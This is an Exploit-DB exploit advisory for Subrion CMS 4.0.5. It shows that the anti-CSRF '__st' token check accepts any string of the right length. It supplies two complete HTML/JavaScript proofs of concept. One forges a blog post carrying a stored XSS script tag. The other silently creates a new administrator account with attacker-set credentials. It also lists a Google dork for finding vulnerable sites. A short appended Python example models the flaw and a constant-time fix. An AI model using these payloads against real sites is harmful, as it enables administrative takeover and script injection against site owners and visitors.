exploit-db-mirror/platforms/php/webapps/40553.txt
Offensive Security 558ab1fc67 DB: 2016-10-18
24 new exploits
2016-10-18 05:01:18 +00:00

# Exploit Title: Subrion CMS 4.0.5 - CSRF Bypass to Persistent XSS and Add-Admin
# Date: 15-10-2016
# Software Link: http://www.subrion.org/download/
# Vendor: http://www.subrion.org
# Google Dork: "Powered by Subrion CMS"
# Exploit Author: Ahsan Tahir
# Contact: https://twitter.com/AhsanTahirAT | https://facebook.com/ahsantahiratofficial
# Website: www.ahsantahir.net
# Category: webapps
# Version: 4.0.5
# Tested on: [Kali Linux 2.0 | Windows 8.1]
# Email: mrahsan1337@gmail.com
[+] CSRF bypass to Persistent XSS
1. Description
Subrion CMS v4.0.5 protects the add-post form with an anti-CSRF token passed in the '__st' parameter, but the check can be
bypassed by submitting any value with the same number of characters as a real token (e.g. XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX).
With the CSRF protection bypassed, a crafted malicious HTML web page can trick the admin/victim into visiting it; once he/she
does, a blog post is created with the tag "</title><script>alert(document.domain);</script>", and the XSS then executes
here: http://localhost/[SubrionPATH]/tag/title-script-alert-document-domain-script/
2. Proof of Concept (CSRF to Persistent XSS)
Log in to your Subrion CMS as admin, visit a web page containing the HTML code below and click "Submit request". A new post
named "Hacked by Ahsan" will be created with the tag "</title><script>alert(document.domain);</script>", which means the
CSRF was exploited successfully!
The XSS will execute here: http://localhost/[SubrionPATH]/tag/title-script-alert-document-domain-script/
[!] PoC Code:
<html>
  <!-- CSRF PoC -->
  <body>
    <script>
      function submitRequest()
      {
        var xhr = new XMLHttpRequest();
        xhr.open("POST", "http://localhost/subi/admin/blog/add/", true);
        xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");
        xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
        xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary=---------------------------292766351574");
        xhr.withCredentials = true;
        // '__st' carries a dummy token of the same length as a real one, which is all the check requires
        var body = "-----------------------------292766351574\r\n" +
          "Content-Disposition: form-data; name=\"__st\"\r\n" +
          "\r\n" +
          "XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX\r\n" +
          "-----------------------------292766351574\r\n" +
          "Content-Disposition: form-data; name=\"title\"\r\n" +
          "\r\n" +
          "Hacked by Ahsan Tahir\r\n" +
          "-----------------------------292766351574\r\n" +
          "Content-Disposition: form-data; name=\"alias\"\r\n" +
          "\r\n" +
          "\r\n" +
          "-----------------------------292766351574\r\n" +
          "Content-Disposition: form-data; name=\"body\"\r\n" +
          "\r\n" +
          "\x3cp\x3eHacked by Ahsan Tahir\x3c/p\x3e\r\n" +
          "\r\n" +
          "-----------------------------292766351574\r\n" +
          "Content-Disposition: form-data; name=\"tags\"\r\n" +
          "\r\n" +
          // the tag value is what later renders unescaped on the tag page
          "\x3c/title\x3e\x3cscript\x3ealert(document.domain);\x3c/script\x3e\r\n" +
          "-----------------------------292766351574\r\n" +
          "Content-Disposition: form-data; name=\"v[image]\"\r\n" +
          "\r\n" +
          "\r\n" +
          "-----------------------------292766351574\r\n" +
          "Content-Disposition: form-data; name=\"image\"; filename=\"\"\r\n" +
          "Content-Type: application/octet-stream\r\n" +
          "\r\n" +
          "\r\n" +
          "-----------------------------292766351574\r\n" +
          "Content-Disposition: form-data; name=\"owner\"\r\n" +
          "\r\n" +
          "Administrator (emailofadmin@gmail.com)\r\n" +
          "-----------------------------292766351574\r\n" +
          "Content-Disposition: form-data; name=\"member_id\"\r\n" +
          "\r\n" +
          "1\r\n" +
          "-----------------------------292766351574\r\n" +
          "Content-Disposition: form-data; name=\"date_added\"\r\n" +
          "\r\n" +
          "2016-10-15 04:41\r\n" +
          "-----------------------------292766351574\r\n" +
          "Content-Disposition: form-data; name=\"status\"\r\n" +
          "\r\n" +
          "active\r\n" +
          "-----------------------------292766351574\r\n" +
          "Content-Disposition: form-data; name=\"save\"\r\n" +
          "\r\n" +
          "Add\r\n" +
          "-----------------------------292766351574\r\n" +
          "Content-Disposition: form-data; name=\"goto\"\r\n" +
          "\r\n" +
          "list\r\n" +
          "-----------------------------292766351574--\r\n";
        // send the body byte-for-byte so the multipart boundaries survive unchanged
        var aBody = new Uint8Array(body.length);
        for (var i = 0; i < aBody.length; i++)
          aBody[i] = body.charCodeAt(i);
        xhr.send(new Blob([aBody]));
      }
    </script>
    <form action="#">
      <input type="button" value="Submit request" onclick="submitRequest();" />
    </form>
  </body>
</html>
----------------------------------------------------------------------------------------------------------------------
[+] Add-Admin CSRF
1. Description
Subrion CMS v4.0.5 also protects the add-admin form with an anti-CSRF token passed in the '__st' parameter, and it can be
bypassed the same way, by submitting any value with the same number of characters as a real token
(e.g. XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX). With the CSRF protection bypassed, a crafted malicious HTML web page can trick the
admin/victim into visiting it; once he/she does, a new admin is created with an email address controlled by the attacker,
which means the attacker now has full administrative control over the Subrion CMS blog!
2. Proof of Concept
Log in to your Subrion CMS as admin, visit a web page containing the HTML code below and click "Submit request". A new admin
named "Haxor" will be created with the email "ahsan@ahsan.py", which means the CSRF was exploited successfully and the
attacker now has full control over the Subrion blog!
[!] PoC Code:
<html>
  <!-- CSRF PoC -->
  <body>
    <script>
      function submitRequest()
      {
        var xhr = new XMLHttpRequest();
        xhr.open("POST", "http://localhost/subi/admin/members/add/", true);
        xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");
        xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
        xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary=---------------------------2573679013209");
        xhr.withCredentials = true;
        // '__st' carries a dummy token of the same length as a real one, which is all the check requires
        var body = "-----------------------------2573679013209\r\n" +
          "Content-Disposition: form-data; name=\"__st\"\r\n" +
          "\r\n" +
          "XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX\r\n" +
          "-----------------------------2573679013209\r\n" +
          "Content-Disposition: form-data; name=\"username\"\r\n" +
          "\r\n" +
          "haxor\r\n" +
          "-----------------------------2573679013209\r\n" +
          "Content-Disposition: form-data; name=\"fullname\"\r\n" +
          "\r\n" +
          "Craxor\r\n" +
          "-----------------------------2573679013209\r\n" +
          "Content-Disposition: form-data; name=\"email\"\r\n" +
          "\r\n" +
          "ahsan@ahsan.py\r\n" +
          "-----------------------------2573679013209\r\n" +
          "Content-Disposition: form-data; name=\"_password\"\r\n" +
          "\r\n" +
          "ahsan123\r\n" +
          "-----------------------------2573679013209\r\n" +
          "Content-Disposition: form-data; name=\"_password2\"\r\n" +
          "\r\n" +
          "ahsan123\r\n" +
          "-----------------------------2573679013209\r\n" +
          "Content-Disposition: form-data; name=\"usergroup_id\"\r\n" +
          "\r\n" +
          "1\r\n" +
          "-----------------------------2573679013209\r\n" +
          "Content-Disposition: form-data; name=\"v[avatar[]]\"\r\n" +
          "\r\n" +
          "\r\n" +
          "-----------------------------2573679013209\r\n" +
          "Content-Disposition: form-data; name=\"avatar[]\"; filename=\"\"\r\n" +
          "Content-Type: application/octet-stream\r\n" +
          "\r\n" +
          "\r\n" +
          "-----------------------------2573679013209\r\n" +
          "Content-Disposition: form-data; name=\"website\"\r\n" +
          "\r\n" +
          "\r\n" +
          "-----------------------------2573679013209\r\n" +
          "Content-Disposition: form-data; name=\"phone\"\r\n" +
          "\r\n" +
          "\r\n" +
          "-----------------------------2573679013209\r\n" +
          "Content-Disposition: form-data; name=\"biography\"\r\n" +
          "\r\n" +
          "\r\n" +
          "-----------------------------2573679013209\r\n" +
          "Content-Disposition: form-data; name=\"facebook\"\r\n" +
          "\r\n" +
          "\r\n" +
          "-----------------------------2573679013209\r\n" +
          "Content-Disposition: form-data; name=\"twitter\"\r\n" +
          "\r\n" +
          "\r\n" +
          "-----------------------------2573679013209\r\n" +
          "Content-Disposition: form-data; name=\"gplus\"\r\n" +
          "\r\n" +
          "\r\n" +
          "-----------------------------2573679013209\r\n" +
          "Content-Disposition: form-data; name=\"linkedin\"\r\n" +
          "\r\n" +
          "\r\n" +
          "-----------------------------2573679013209\r\n" +
          "Content-Disposition: form-data; name=\"sponsored\"\r\n" +
          "\r\n" +
          "0\r\n" +
          "-----------------------------2573679013209\r\n" +
          "Content-Disposition: form-data; name=\"featured\"\r\n" +
          "\r\n" +
          "0\r\n" +
          "-----------------------------2573679013209\r\n" +
          "Content-Disposition: form-data; name=\"featured_end\"\r\n" +
          "\r\n" +
          "2016-11-15 04:54\r\n" +
          "-----------------------------2573679013209\r\n" +
          "Content-Disposition: form-data; name=\"status\"\r\n" +
          "\r\n" +
          "active\r\n" +
          "-----------------------------2573679013209\r\n" +
          "Content-Disposition: form-data; name=\"save\"\r\n" +
          "\r\n" +
          "Add\r\n" +
          "-----------------------------2573679013209\r\n" +
          "Content-Disposition: form-data; name=\"goto\"\r\n" +
          "\r\n" +
          "list\r\n" +
          "-----------------------------2573679013209--\r\n";
        // send the body byte-for-byte so the multipart boundaries survive unchanged
        var aBody = new Uint8Array(body.length);
        for (var i = 0; i < aBody.length; i++)
          aBody[i] = body.charCodeAt(i);
        xhr.send(new Blob([aBody]));
      }
    </script>
    <form action="#">
      <input type="button" value="Submit request" onclick="submitRequest();" />
    </form>
  </body>
</html>
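Both sections above describe the same root cause: the '__st' check accepts any value of the right length. The Python below is an added example, not Subrion's code or the author's PoC; it reconstructs that class of bug as a hypothetical length-only validator beside a constant-time comparison against the session token, and runs both over a constructed multipart body shaped like the PoCs. The names parse_multipart, csrf_ok_length_only, csrf_ok, handle_add_post, the session layout and TOKEN_LEN are assumptions.

```python
import hmac
import re
import secrets

TOKEN_LEN = 33  # assumed token length; the advisory's dummy value is a run of X's of the real length


def parse_multipart(boundary: str, body: bytes) -> dict:
    """Minimal multipart/form-data reader: returns {field name: value}."""
    fields = {}
    delim = b"--" + boundary.encode()
    for chunk in body.split(delim)[1:]:
        if chunk.startswith(b"--"):
            break  # closing delimiter reached
        head, _, value = chunk.partition(b"\r\n\r\n")
        m = re.search(rb'name="([^"]*)"', head)
        if m:
            fields[m.group(1).decode()] = value.removesuffix(b"\r\n").decode()
    return fields


def csrf_ok_length_only(submitted: str, expected: str) -> bool:
    """Hypothetical weak check: any value of the right length passes."""
    return len(submitted) == len(expected)


def csrf_ok(submitted: str, expected: str) -> bool:
    """Hardened check: constant-time equality with the per-session token."""
    return bool(expected) and hmac.compare_digest(submitted, expected)


def handle_add_post(session: dict, boundary: str, body: bytes, check) -> bool:
    """True if the post/admin would be created under the given CSRF check."""
    fields = parse_multipart(boundary, body)
    return check(fields.get("__st", ""), session.get("__st", ""))


# Constructed sample: a session holding a real random token, and a forged
# request body (like the PoCs) carrying only X's of the same length.
SESSION = {"__st": secrets.token_hex(TOKEN_LEN)[:TOKEN_LEN]}
BOUNDARY = "----ConstructedBoundary1234"
FORGED = (
    f'--{BOUNDARY}\r\nContent-Disposition: form-data; name="__st"\r\n\r\n'
    f"{'X' * TOKEN_LEN}\r\n"
    f'--{BOUNDARY}\r\nContent-Disposition: form-data; name="title"\r\n\r\n'
    f"Test post\r\n"
    f"--{BOUNDARY}--\r\n"
).encode()
```

handle_add_post(SESSION, BOUNDARY, FORGED, csrf_ok_length_only) returns True (the forgery goes through), while the same call with csrf_ok returns False.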
Credits & Authors:
==================
Ahsan Tahir - [https://twitter.com/AhsanTahirAT]